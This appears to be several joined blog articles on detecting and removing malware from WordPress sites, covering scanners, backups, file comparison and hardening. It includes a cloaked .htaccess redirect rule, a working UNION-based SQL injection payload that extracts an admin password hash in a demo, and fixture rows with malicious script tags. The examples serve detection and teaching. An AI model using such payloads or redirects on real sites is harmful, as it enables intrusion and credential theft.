For example, I (after some time, of course) made one conclusion for myself - you just need a good hoster, and your reservation problems will disappear by themselves. I don’t need to make backups of the database or the site now - the hoster does everything for me, and automatically. At any time, if you wish, you can order a copy of any section of your blog (and not only), download this copy, or restore the blog directly from the control panel. That is, I do not need to download a backup, everything happens automatically - backup, restore, etc. This is convenient because I can track, not just by the day, but by the hour, when a virus appeared on my blog and, accordingly, take measures to eliminate it.

I'll start with the good news: at least two of the plugins I've used perform well in detecting and locating malicious code. These are the AntiVirus and Exploit Scanner plugins. You won't believe how much bad code is on your blog! But do not take all the information you get after checking as dogma; many lines that these plugins detect actually carry nothing bad in themselves. The plugin merely questions some lines, that's all. To verify this, manually check the fragments that the plugin has identified as malicious. So, when checking with the AntiVirus plugin, it turned out that even a simple call to the function get_cache_file() is already considered suspicious by the plugin. So all the results of the checks will have to be tracked manually. But this, for example, is a really infected link, and it needs to be removed:

How do you know whether it is a virus or whether it is supposed to be there? It is very simple: take your clean copy of the template (if you have one) and compare it, file by file, with the one that is installed and has already undergone changes. The comparison does not have to be literal; it is enough to search the clean template for the line the plugin highlighted. If it is there, click the "This is not a virus" button, and the line will be ignored during the next check.

And here is an example from the second plugin I tried, Exploit Scanner:

As you can see, things are much more neglected here. For me, this result was shocking. But that's not all. The plugin also has a function for checking . If you turn it on, it turns out that the blog should consist of text and at most a couple of CSS stylesheets. So it seems to me that the plugin's author obviously overdid it with security here. It is good that the plugin only shows the allegedly infected fragments and does not clean them itself.

After analyzing all the lines highlighted in yellow, you can easily detect malware (malicious code); what to do with it next is up to you. The cleaning method is the same: compare the highlighted code with the site backup and, if you find discrepancies, determine whether you made the change yourself or someone did it for you; in the latter case it is no longer good and may well be a virus. Even the WordPress developers advise checking the site for malicious code with this particular plugin. But there are harmless inserts, for example in the body of an iframe, which the plugin may also report as infected code, while in fact that section of your blog will not work correctly without those lines.

How can malware get into blog files at all, and what is it by definition? The word malware is short for malicious software. It is any software that can be used for unauthorized access to the site and its content. You can imagine that for a reasonably skilled hacker it is not hard to break into a site, especially one with open user registration. After that the attacker can modify the blog's content however they like.

Malware can also be inserted into plugins that you install from an unknown source, and into scripts that you sometimes also take without checking, simply trusting the author. The most harmless kind of malware is a link to the author of some module you installed on the site. But if the author did not warn you that such a link exists, then this is already a pure virus.

For instance, I installed a new theme on a test blog, and after deleting one harmless-looking link to some men's club in the site footer, the site stopped opening at all, and the main page displayed the message "You have no right to remove links." That is a free theme for you. How to tear out such unwanted links is covered separately.

Your database can also be used to run malicious code. Spammy links are very often added to posts or comments. Such links are usually hidden with CSS so that an inexperienced administrator does not see them, but a search engine spots them immediately. Of course, an anti-spam plugin helps here, preferably one that is licensed and has been checked and rechecked many times. A hacker can also upload files with image extensions and include them from the code of your active plugins; even if a file does not have a .php extension, the PHP code inside it is executed once another script includes it.

There is another simple tool with which I began my acquaintance with malware: the Theme Authenticity Checker (TAC) plugin. It is lightweight and powerful enough, but it only checks your themes, including the inactive ones. It does not touch the other directories, and that is its drawback. Here is what I got from checking my current theme with this plugin:

Two warnings in the active theme and nothing else. There is no malicious code: these are links I inserted myself, on Google's advice, to improve the quality of the snippet (displaying contact details, the organization's address, and so on). But this only checks the theme files; what is going on in the other directories you will have to find out with other plugins or online services. For example, a service that deserves trust is Yandex Webmaster, or its equivalent from Google. They can check any web resource for malicious inclusions, and they do it efficiently. If that is not enough for you, compare the results with those of other services and draw your conclusions.

For some reason I am inclined to believe Yandex rather than the plugins. Another good resource is http://2ip.ru/site-virus-scanner/. After checking one of my blogs, here is what I found:

Here you can also check individual files for malicious code if you have such doubts. In general, the service is good.

From all of the above, I would draw the following conclusions:

1. In order to prevent the appearance of malicious code, you must first of all use trusted services for downloading files - plugins, themes, etc.

2. Regularly make backup copies of everything the site contains: the database, the content, the admin panel, including uploaded third-party files.

3. Apply the updates WordPress offers. They are at least virus-free, even if not always functionally justified. Bear in mind, though, that updating or reinstalling the core only overwrites the core files; it does not remove a backdoor an attacker has placed elsewhere (in a theme, a plugin, or wp-content/uploads), so an update is not a substitute for a cleanup.

4. Delete unused themes, plugins, images and files without regret; they are another hiding place for malware that you might never think to look at.

5. Be sure to password-protect your FTP access, phpMyAdmin login, admin panel and, in general, everything that no one but you should have access to.

6. Try (however great the temptation) not to change or replace WordPress core files; the developers know better what should work and how.

7. After detecting and removing viruses, change all passwords. You will probably feel a strong urge to make a 148-character password with mixed case and special characters. But do not get carried away with overly complicated passwords: you may lose it, and then you will have to restore everything, which is not pleasant.

All the methods and tools I have described that help you get rid of viruses are, of course, free, almost home-made, and do not give a 100% guarantee that your site will be cleaned of malicious inserts. So if you are already concerned about cleaning the blog, it is better to turn to professionals, for example the Sucuri service (http://sucuri.net/). There your site will be carefully monitored, practical recommendations will be sent to you by e-mail, and if you do not want to clean the site yourself, specialists are at your service who will do everything properly within 4 hours:

The WordPress platform is gaining more and more popularity among bloggers due to the convenient and fast process of creating and managing a Web site. Separately, it should be noted a huge number of free plugins and widgets available for this system. Based on this platform, you can build not only a regular blog, but also an entire online store, news portal or online cinema.

But most of the websites built on this free CMS have certain security vulnerabilities. WordPress developers, of course, are trying to quickly close them and release updates not only for the platform itself, but also for standard themes and plugins. However, it is not always possible to protect yourself from hacking.

Based on the latest research presented on the official website of the platform, one can get a clear idea of ​​the infection mechanisms, since a site built on WordPress can be hacked mainly through third-party plugins or modified themes.

In the event of a hack, most inexperienced Web administrators tend to panic and make irreparable mistakes that can lead to the loss of the entire database or files. In this article, we will try to tell you how to "cure" a Web site and return it to the state in which it was before the hack.

Backup

There are two parts to backing up a website: copying the site's files and copying the database (DB). WordPress has a built-in export tool, but it only produces an XML file of the content (posts, pages, comments); it copies neither the site files nor the full database.

To back up files, you can use third-party plugins or the full automatic backup that hosting providers usually offer. Setting up a full backup on a schedule is not very difficult, and later it can save the administrator's nerves and a significant amount of time. If you cannot set up a full backup mechanism yourself, it is strongly recommended that you contact your hosting provider about this important issue. Novice administrators may be advised to perform regular manual backups as well.

If a copy of the site and the database is also kept offline (for example on a flash drive), you have a copy that an attacker who compromises the server or the hosting account cannot tamper with, and you can restore the website from it at any time.

Recovery or treatment

Almost all Web sites are designed to generate income for their owner. Therefore, it is a requirement for a Web site to operate 24x7 (24 hours a day, 7 days a week) with minimal downtime for maintenance.

Therefore, in the event of an infection, administrators strive to restore information from backups as quickly as possible. But since the problem persists and the website still has a "hole" in its security, it will be hacked again very soon, and it will not take the attacker much time.

This will repeat over and over, especially for popular websites, so the correct solution is to close the vulnerability urgently. If you limit yourself to repeatedly restoring the website, you can lose all your search engine rankings and even fall under a search engine filter for spreading malware.

How to detect malware

How do you know that a website has been hacked, and what are the first symptoms of an infection? It is actually quite simple: a sudden drop in traffic statistics, redirects to unfamiliar websites and excessive traffic consumption are all signs of infection and of the presence of malicious links that lower the resource's rating. Not to mention the obvious situation when a mark about the "infection" of your website appears in the Yandex or Google search results.

When an infected site is opened in Opera, Chrome or Firefox, the browser displays a warning about an infected resource, since these browsers maintain their own databases of infected sites. A local antivirus may also report that the website is infected when you try to navigate between its pages. It may also turn out that the website has been hacked and is being used to send spam; you find out about this when your hosting contact address starts receiving abuse notifications about bulk spam.

How should one act in such situations? First you need to determine where the virus or advertising link is hiding and how it got onto the site, since the theme, the database or the site core can be "infected".

The easiest, though also the slowest, way to look for a virus is to track file modification dates. Suppose most of the files in the most important directories (wp-includes, wp-admin, etc.) have the same modification date, but one or two files have later dates. Check these files and compare them with the files from the WordPress distribution of the same version. You can also compare files by size in Total Commander. Then it remains to compare the contents of the suspicious files and find out what the extra code fragments are for. Bear in mind that an attacker can reset timestamps (for example with touch), so a file with an old date is not automatically clean; comparing checksums against the distribution is more reliable.

How to check the processed HTML code

Perhaps, for some reason, you were unable to detect the problem with the method described above. Then you can try to find the source of infection in another way.

Open the "infected" website in a browser (preferably Opera or Firefox) and select "View page source". If you know HTML, you will probably notice suspicious strings: unfamiliar links to other sites, pieces of "compressed" or base64-encoded code, or an unknown piece of JavaScript, which will probably also be obfuscated. A tell-tale sign is a call to eval in the fragment: it usually means someone is trying to hide the real JavaScript, which should raise suspicion. Figure 1 shows an example of suspicious code.

Fig. 1 Fragment of suspicious HTML code

By the way, if a free third-party template is used on the website, the same method can be used to find sponsored links embedded by the template's authors. Usually such links are harmless, i.e. they are not viruses. However, they can hurt the website's standing in search engines and redirect traffic to a third-party resource.

When malicious code on the site's pages cannot be found with the methods described above, dedicated tools can be used. For example, install the WordPress Exploit Scanner plugin, which will check your website for malware on request. The plugin provides a detailed report and highlights the lines that should be reviewed and, where they really are malicious, deleted.

In addition, you can scan the website with the online scanner Sucuri SiteCheck; this service is free, and for a fee you can order a complete cleanup of the resource.

How to Check Plugins and Themes for Malicious Code

As for themes, you can look for malicious code in them manually or install the TAC plugin, which works with theme files, checking them for extraneous links and virus code. With this plugin you can check both already installed themes and new ones.

Determining whether a theme contains a virus is simple. If the active theme is based on one of the official themes, you just need to compare the original code with the code of the theme being checked. Alternatively, download the default theme that ships with the WordPress distribution, rename its folder so that it does not overwrite anything, and switch the site to it. Then check the HTML generated by the server for the virus: if it is still there, the problem is clearly not in the theme.

If malicious code was found in the files of the active theme, and additional themes were installed but not activated, you will have to check each of them too, since the virus may infect certain files throughout the themes directory. It is best to use only one theme and delete all inactive ones.

Searching for viruses in plugin code is also not particularly difficult. Disable the plugins one by one and check the generated HTML code after each step. In this way you can identify the infected plugin, remove it and reinstall it from the repository.

The best ways to protect WordPress plugins and themes:

  • download and install themes and plugins only from trusted websites;
  • do not use "hacked" paid plugins and themes;
  • remove unused plugins and themes;

How to Find Malicious Code in WordPress Core Files

If you have checked the plugins and themes but still have not been able to identify the source of the infection, it may be located directly in the WordPress core files. A core infection usually means that an attacker gained access to the administrative part of the site, or guessed or intercepted the password used to access the website via FTP.

First of all, check the computer from which you accessed FTP or the website's administrative interface for viruses. The password could have been stolen from your computer by a Trojan that passed sensitive data to an attacker.

Attackers often embed redirect rules and encoded links to malicious scripts on remote servers in .htaccess, so the first step is to compare this file with the original one from the distribution. Pay special attention to lines like these, which send visitors arriving from a search engine to a third-party site while everyone else (including you, the owner) sees the normal page:

RewriteCond %{HTTP_REFERER} .*yandex.*
RewriteRule ^(.*)$ http://unknownsite.com/

If such lines are found, do not delete them immediately. First ask the hosting provider for the logs covering the approximate period when .htaccess was modified, and find out from which IP address and when the file was uploaded. It is possible that other files were changed at the same time.

If only this file has been changed, the FTP and administrative interface passwords should be changed. If changes are also found in *.php or *.html files, then most likely a PHP script (a web shell) was uploaded to the site, through which the attacker can access all the information available to the web server.
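The cloaked redirect shown above is easy to miss among the legitimate WordPress rewrite rules, so it is worth checking .htaccess mechanically. The following is an added example written for this article, not part of WordPress or Apache: it pairs each RewriteRule with the RewriteCond lines that precede it (which is how Apache applies them), reports every rule whose target is an absolute URL on a host other than the site's own, and marks as cloaked those that depend on the referer or user agent. The .htaccess content is constructed inline; the site's own hostname, the archive host and the redirect target are placeholders.

```python
import re
from urllib.parse import urlsplit

DIRECTIVE = re.compile(r"^\s*(RewriteCond|RewriteRule)\s+(.*?)\s*$", re.I)
# Conditions on these variables let the attacker show the redirect only to
# visitors coming from search engines (or to crawlers) and hide it from the owner.
CLOAKING_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")


def parse_rewrites(text):
    """Return (conditions, rule) pairs; RewriteCond lines apply to the next RewriteRule only."""
    pairs, pending = [], []
    for line in text.splitlines():
        m = DIRECTIVE.match(line)
        if not m:
            continue
        if m.group(1).lower() == "rewritecond":
            pending.append(m.group(2))
        else:
            pairs.append((pending, m.group(2)))
            pending = []
    return pairs


def find_external_redirects(text, own_hosts):
    """Rules that send visitors to another host, with a cloaking flag."""
    findings = []
    for conds, rule in parse_rewrites(text):
        parts = rule.split()
        if len(parts) < 2:
            continue
        host = urlsplit(parts[1]).hostname
        if not host or host in own_hosts:
            continue  # relative rewrite, "-" (no substitution), or our own host
        cond_text = " ".join(conds).upper()
        findings.append({
            "host": host,
            "cloaked": any(var in cond_text for var in CLOAKING_VARS),
            "conditions": list(conds),
            "rule": rule,
        })
    return findings


# Constructed .htaccess: the standard WordPress block, a harmless www->bare
# redirect, an unconditional redirect to an archive host, and a cloaked
# redirect of the kind described in the text (unknownsite.com is the
# article's placeholder).
SAMPLE_HTACCESS = r"""
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

RewriteCond %{HTTP_HOST} ^www\.example\.com$ [NC]
RewriteRule ^(.*)$ https://example.com/$1 [R=301,L]

RewriteRule ^old-blog/(.*)$ https://archive.example.net/$1 [R=301,L]

RewriteCond %{HTTP_REFERER} .*yandex.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.* [NC]
RewriteRule ^(.*)$ http://unknownsite.com/ [R=302,L]
"""


if __name__ == "__main__":
    for finding in find_external_redirects(SAMPLE_HTACCESS, {"example.com"}):
        flag = "CLOAKED" if finding["cloaked"] else "external"
        print(f"{flag}: {finding['rule']}  conditions={finding['conditions']}")
```

The unconditional archive redirect is reported as well, at lower priority, because a redirect to a host you do not recognise deserves a look even when it is not cloaked; the standard WordPress block and the www-to-bare rule produce no findings.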

Prevention of this type of threat is quite simple and does not require special costs. It is important to remember the following rules:

  • do not store passwords in FTP clients or in e-mail messages;
  • update WordPress core regularly;
  • update plugins and themes;
  • do not use simple passwords.

It is possible that you initially followed all these rules, and the point is not the vulnerability of the Web site, but the insufficient protection of the server itself on which the resource is located. In such cases, send a detailed description of the problem to the technical support of the hosting provider and together look for a solution to the problem.

How to Find Malicious SQL Injection in WordPress

So, we have looked at various ways in which a website based on the free WordPress CMS gets infected and disinfected. But one of the popular methods of penetration is SQL injection. In this attack, input controlled by the attacker ends up inside a database query without proper escaping, so the attacker can make the database return data it should not, such as the password hashes of the administrative accounts, or other confidential information. As far as WordPress itself is concerned, the gaps in database handling and query filtering that were known at the time of the last update have been fixed.

To protect the site from hacking via SQL injection, choose plugins carefully, since they work with the database, and an insufficiently conscientious developer could leave a loophole for attackers. In some free plugins such a hidden entrance may even be built in deliberately. When choosing a plugin, be guided not only by its capabilities but also by its popularity and the number of installations. It is also worth reading the reviews on the developer's page. If you have the slightest doubt, or there is a negative review concerning security, it is better not to take the risk and to install another plugin with similar functionality.

Most CMS are built so that a user with minimal programming skills can install and configure them, enable one of the offered designs and start filling the website with content. As a result, websites are often in the hands of inexperienced administrators who cannot recognize an intrusion via SQL injection.

But the WordPress Exploit Scanner plugin mentioned earlier can also work with the database, and in some cases it can find extraneous functionality embedded in it. You will have to delete it manually with SQL commands in the phpMyAdmin database administration tool. Such actions must be performed very carefully, as an incorrect query or command can damage the structure or contents of the database. To guard against this, take care of creating database backups in advance. Incidentally, Exploit Scanner itself can issue recommendations for fixing SQL queries.
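To make the injection described in this section concrete, here is an added example written for this article; it is not WordPress or plugin code. A "search published posts by title" query is written twice, once by pasting the user's term into the SQL string (the bug a careless plugin author writes) and once with a bound parameter, and a payload of the kind an attacker would send is run through both. SQLite is used as an in-memory stand-in for MySQL, so string concatenation is `||` rather than CONCAT(), and the table contents, including the password hash, are constructed. In a real plugin the hardened form is `$wpdb->prepare()` with `%s` placeholders.

```python
import sqlite3


def make_db():
    """Constructed stand-in for wp_users and wp_posts (SQLite, in memory)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_status TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BexampleHashNotARealOne');
        INSERT INTO wp_posts VALUES (1, 'Hello world', 'publish');
        INSERT INTO wp_posts VALUES (2, 'Unfinished draft', 'draft');
    """)
    return db


def search_titles_vulnerable(db, term):
    """Vulnerable: the search term is spliced into the SQL text.

    Whatever the user types becomes part of the query, so a quote in the term
    ends the string literal and the rest is interpreted as SQL.
    """
    sql = ("SELECT post_title FROM wp_posts "
           "WHERE post_status = 'publish' AND post_title LIKE '%" + term + "%'")
    return [row[0] for row in db.execute(sql)]


def search_titles_safe(db, term):
    """Hardened: the term travels as a bound parameter and can never become SQL."""
    sql = ("SELECT post_title FROM wp_posts "
           "WHERE post_status = 'publish' AND post_title LIKE ?")
    return [row[0] for row in db.execute(sql, ("%" + term + "%",))]


# A UNION-based payload: it closes the LIKE literal, appends a SELECT against
# wp_users and comments out the trailing quote the vulnerable code adds.
PAYLOAD = "x%' UNION SELECT user_login || ':' || user_pass FROM wp_users -- "


if __name__ == "__main__":
    db = make_db()
    print("normal search   :", search_titles_vulnerable(db, "Hello"))
    print("injected, unsafe:", search_titles_vulnerable(db, PAYLOAD))
    print("injected, safe  :", search_titles_safe(db, PAYLOAD))
```

Both functions return the same result for an ordinary search term; the difference only shows when the term contains SQL syntax, which is why this class of bug survives testing with normal input. The vulnerable version hands back the administrator's login and password hash, exactly the "stolen password" outcome the section describes; the parameterized version treats the payload as a literal string and finds nothing.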

Practical Ways to Protect Websites Built on WordPress

There are many tips on the internet on how to secure and protect a website running on the free WordPress CMS. Below is a list of the most effective recommendations:

  • change the standard names of users with administrative rights (admin, administrator, etc.) and never use them;
  • install a captcha, which significantly reduces the risk of brute-force password guessing;
  • use a complex alphanumeric password of at least 8-10 characters for the administrative interface (longer is better);
  • do not store the password in a web browser, text files, etc.; offline storage on a piece of paper is much more reliable;
  • also protect the password of the mailbox specified during WordPress installation, since the administrator password can be reset through it;
  • regularly make backups manually or with special plugins or third-party programs, and store the resulting backups in several places;
  • do not install plugins from unknown sources, or "hacked" paid plugins and themes;
  • install plugins that are responsible for the security of WordPress files and the database, and regularly check the status of the site with an antivirus scanner;
  • update the core, plugins and themes in time (before each update, be sure to make a full backup);
  • the advice often given to rename the admin login file (admin.php) so that it is harder to identify conflicts with the rule above not to modify core files and breaks updates; instead, restrict access to wp-login.php and the wp-admin directory by IP address or with an additional HTTP authentication layer;
  • register the website with Yandex or Google webmaster tools in order to be informed of problems related to site security and indexing;
  • check the permissions on WordPress directories and files: 755 for directories and 644 for files. Do not set wp-content to 777 (world-writable), as is sometimes recommended: that lets any process on the server write into it, which is exactly what an attacker needs to drop a web shell. If the web server must write to wp-content/uploads, give write access to that directory only, and only to the web server's own user;
  • if there is no need for user registration, disable it altogether;
  • you can also disable comments and leave only the form for commenting through social networks;
  • delete the readme.html file in the root directory, which stores information about the installed WordPress version (this must be done after each CMS update);
  • remove the mention of the WordPress version from the page header by adding the line remove_action('wp_head', 'wp_generator'); to the theme's functions.php.

What to do if the problem is still not solved?

There are no hopeless situations. It may seem that you have tried absolutely every way to neutralize the virus code or the hidden advertising links. It may also be that the website has stopped working after an unsuccessful cleanup and you are no longer able to restore it. Do not despair; contact specialists who, for a fee, will help you restore the website and advise you on improving its security and performance. You can also write to WordPress support, look for the answer in the WordPress Codex, or ask a question on the official forum.

If you got rid of the viruses, correctly configured the security plugins, changed the passwords, and after a while the situation repeated, then you should consider changing the hosting provider: most likely the servers hosting the website are poorly secured or misconfigured.

Conclusion

Most of the tips presented will remain relevant for a very long time, as they apply not only to WordPress, but to any Web sites, regardless of the platform used. The Internet is developing rapidly, new updates are constantly appearing and new viruses are being written, gaps in the security of CMS and various services are being closed. Keep up with the times, regularly upgrade and update the Web site, and then you can avoid such emergencies.

As one of the most popular platforms, WordPress is attacked from time to time by trojans, malware injections, and the like.

There are already several articles about building sites on WordPress, and they also contain information on how to clean your resource of malware. The topic is so relevant and critical that discussing it again will not only do no harm but will benefit the owners of all kinds of sites.

Beginners who have only just started working with various CMS are seriously frightened when they discover that their resource has been attacked by viruses. Trying to restore the normal operation of their projects, they make mistakes that ultimately aggravate the situation and in some cases lead to the loss of data or necessary files. In this article we will explain how to study current threats, detect them, and clean the site of viruses without harming your data and content.

Make backups regularly!

Before we start discussing WordPress hacking, it is essential to discuss backups. If you use WordPress and plan to have a large number of visitors, you simply must get in the habit of backing up your blog regularly. Save all content, settings and databases to be able to fully restore all files. This will not take much time, but it will help to avoid serious problems in the future.

Which is better: site restoration or timely detection of a virus?

If you use a backup utility, you can restore the project to its original state. However, I do not think that is a very good idea on its own. Restoring from a backup without finding and removing the malicious code will not solve the problem; your site will still be in a vulnerable state. So the best course is to find the virus, get rid of it, restore the site, and then close the vulnerability.

Malware detection

Malicious software is content that is distributed with the intent to harm or obtain your personal information. This malicious code can be spoofed or inserted into design elements, plugins, files, or a database. If the site has been hacked, malicious software can also get onto visitors' computers, redirecting them to various resources that also contain other viruses, or simply opening the necessary sites through frames from your site. At the moment, there are many different variations of hacking, both WordPress engines and any other sites.

Search for infected pages

You can start your search by browsing the pages for malicious code.

  • Is it visible on all pages?
  • Does it appear on certain pages or posts?
  • Where exactly does the malicious code appear? In the header, in the footer, somewhere in the content, or in the sidebar?

The answers to these questions will tell you exactly where to look for the problem.

Check design elements and plugins for malicious code

The most commonly infected objects are themes and plugins. Start by checking the active theme (the one currently in use) for malicious code. If you have added any themes other than the default one, check each of them.

The easiest check is to copy the entire themes directory to your local computer as a backup and then delete it from the server. Then download the default WordPress theme, Twenty Eleven, from the official source and upload it to the server. After that, check the site: if the attackers' code has disappeared, the problem was in one of the themes.

Now you can look for the malicious code in the old themes folder by opening each file in turn in a text editor. Scrolling through the code, you may notice a suspicious-looking part and remove it. There is also an easier option: simply download a fresh copy of the active theme from the developer's website.

Imagine such a scenario that you could not find a virus in your templates. Then, the next step is to search for it in the plugins you use. In this case, the same method that is used in the case of themes is suitable.

Back up the plugins to your local computer and delete them from the server. Then check the site and see whether the malware has disappeared. If the problem is solved, it was in one of your plugins. Download fresh copies of the plugins you had and enable them one at a time. If the virus reappears after a new copy is installed and enabled, remove that plugin from your server.

The best ways to secure your themes and plugins are:

  1. Remove unused plugins and themes.
  2. Make sure you download themes and plugins from a trusted source.
  3. Always use the updated versions of the themes and plugins you rely on.
  4. Do not use themes and plugins downloaded from torrents and unofficial sites.

How to detect malicious code embedded in WordPress itself:

If you have checked the themes and plugins you use and the infection is still present on your site, the next step is to check the core WordPress files. Again, the method used in cases with themes and plugins will help here.

First of all, back up the files you need (for example wp-config.php, the wp-content folder, as well as .htaccess and . files). Then delete all files from the server, download a fresh copy of the engine archive and upload it to the server. Fill in wp-config.php with the required information. Then check the site for viruses: if they have disappeared, the problem was in the engine itself, i.e. the core files were infected. Restore the necessary content from the backup: images and any video or audio files.

How to protect core WordPress files from infection:

  1. Make sure the permissions are set to 644 on all files.
  2. Do not change or move core files.
  3. Use only complex passwords everywhere - on FTP, Database, WordPress, etc.

How to detect a vulnerability in the WordPress database:

The next step is to check the database. First of all, make sure you have a database backup. If you make backups regularly, you can restore it to its original form quickly and without problems, but first you need to make sure that the infection is actually in the database.

Download and install the Exploit Scanner plugin. Run it and scan the site. The plugin will scan your database, core files, plugins and themes for suspicious code and return the results when the scan is complete. Then review the results. The scan report will contain a large number of false positives and warnings, so read the log slowly and carefully. The scanner does not remove anything, so once you find malicious code you will need to remove it from the database by hand.

  • If you have not backed up your database before, do so even if your site has been attacked and infected.
  • A backup of an infected database is in any case better than having no backup at all.

Copy each suspicious fragment from the scan log and search for it in a copy of the database (for example, one imported into a test database in phpMyAdmin), rather than executing anything from the log: the aim is to find every row in which the fragment occurs, not to run it.

Depending on where the suspicious code was inserted (articles, comments or other sections), you can then edit the affected fields by hand, removing only the foreign code, if there are not too many of them. If there is a lot of it, a find-and-replace across the whole database is tempting, but it is quite dangerous: a careless pattern can hit legitimate content, and if you are not sure what you are doing there is a real risk of losing important data.
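Scanning the database tables and then removing only the foreign fragment, as the paragraphs above recommend, can be done outside phpMyAdmin with a short script. The following is an added example written for this article, not WordPress or Exploit Scanner code: it looks through wp_posts, wp_comments and wp_options for hidden links, script tags and iframes, ignores embeds that point at the site's own hosts (a legitimate video iframe must not be reported as an infection), and deletes each reported fragment from its own row only. SQLite is used in memory as a stand-in for MySQL, every row is constructed, and the host names are placeholders.

```python
import re
import sqlite3
from urllib.parse import urlsplit

INJECTION_PATTERNS = {
    "hidden link": re.compile(r"<(?:div|span|p)[^>]*display\s*:\s*none[^>]*>.*?</(?:div|span|p)>", re.I | re.S),
    "script": re.compile(r"<script\b.*?</script>", re.I | re.S),
    "iframe": re.compile(r"<iframe\b.*?</iframe>", re.I | re.S),
}
URL = re.compile(r"https?://[^\s'\"<>]+")

# (table, primary key, content column): the places spam and loaders usually land.
TARGETS = [
    ("wp_posts", "ID", "post_content"),
    ("wp_comments", "comment_ID", "comment_content"),
    ("wp_options", "option_id", "option_value"),
]


def make_db():
    """Constructed stand-in for the three tables, with one infection in each."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);
        CREATE TABLE wp_comments (comment_ID INTEGER PRIMARY KEY, comment_content TEXT);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
    """)
    db.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", [
        (1, "About", "<p>We make widgets.</p>"),
        (2, "News", '<p>Update.</p><div style="display:none"><a href="http://pills.invalid/">buy</a></div>'),
        (3, "Video", '<p>Our talk:</p><iframe src="https://video.example.com/embed/1"></iframe>'),
    ])
    db.executemany("INSERT INTO wp_comments VALUES (?, ?)", [
        (1, "Nice post!"),
        (2, '<script src="http://evil.invalid/c.js"></script>Great'),
    ])
    db.executemany("INSERT INTO wp_options VALUES (?, ?, ?)", [
        (1, "siteurl", "https://example.com"),
        (2, "widget_text", "<script>document.location='http://evil.invalid/'</script>"),
    ])
    return db


def find_injected(db, allowed_hosts):
    """Return (table, row_id, label, fragment) for every suspicious fragment.

    A fragment whose URLs all point at allowed_hosts is skipped; a fragment
    with no URL at all (an inline script) is always reported.
    """
    findings = []
    for table, key, col in TARGETS:  # names come from the fixed list above, not from input
        for row_id, content in db.execute(f"SELECT {key}, {col} FROM {table} ORDER BY {key}"):
            for label, rx in INJECTION_PATTERNS.items():
                for m in rx.finditer(content or ""):
                    hosts = {urlsplit(u).hostname for u in URL.findall(m.group(0))}
                    if hosts and hosts <= allowed_hosts:
                        continue
                    findings.append((table, row_id, label, m.group(0)))
    return findings


def remove_fragment(db, table, row_id, fragment):
    """Targeted cleanup: strip one exact fragment from one row and nothing else."""
    key, col = next((k, c) for t, k, c in TARGETS if t == table)
    (content,) = db.execute(f"SELECT {col} FROM {table} WHERE {key} = ?", (row_id,)).fetchone()
    cleaned = content.replace(fragment, "")
    db.execute(f"UPDATE {table} SET {col} = ? WHERE {key} = ?", (cleaned, row_id))
    return cleaned


def clean_all(db, allowed_hosts):
    """Find, then remove, every reported fragment; returns what was removed."""
    findings = find_injected(db, allowed_hosts)
    for table, row_id, _label, fragment in findings:
        remove_fragment(db, table, row_id, fragment)
    db.commit()
    return findings


if __name__ == "__main__":
    db = make_db()
    for item in clean_all(db, {"example.com", "video.example.com"}):
        print(item)
```

On a live site, run this against a copy of the database first and read the list returned by find_injected() before calling clean_all(). The per-row replacement is deliberately narrow: a global find-and-replace over wp_options can break PHP-serialized values, whose stored string lengths no longer match once the text inside them is edited, which is the data-loss scenario the paragraph above warns about.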

We went through all the points, and you ran out of ideas where to look for the problem?

I think most people can detect, study and remove a virus if their site is attacked and infected. Nevertheless, in some cases finding the virus can be quite difficult. If you have tried all the methods above and still cannot find what exactly the problem is, you can always turn to WordPress security experts, who will clean your site of viruses for a fee.

Finding the right security specialist for WordPress products

There are many freelancing websites where you can offer a reward for helping solve a problem. Before the final selection of a candidate, pay attention to the reviews and awards that he has received, and choose the most experienced and competent. You can also post offers on popular SEO forums or freelance exchanges. Be sure to make sure that the person you are hiring has a good reputation, references and work experience.

Conclusion

WordPress itself is actively maintained, but a site is only as secure as its owner keeps it. As the site owner, it is your responsibility to monitor the state of the site and use up-to-date methods of protection against possible threats. Use complex passwords, regularly check access rights and make backups, and remove unnecessary files and data from the site in a timely manner.
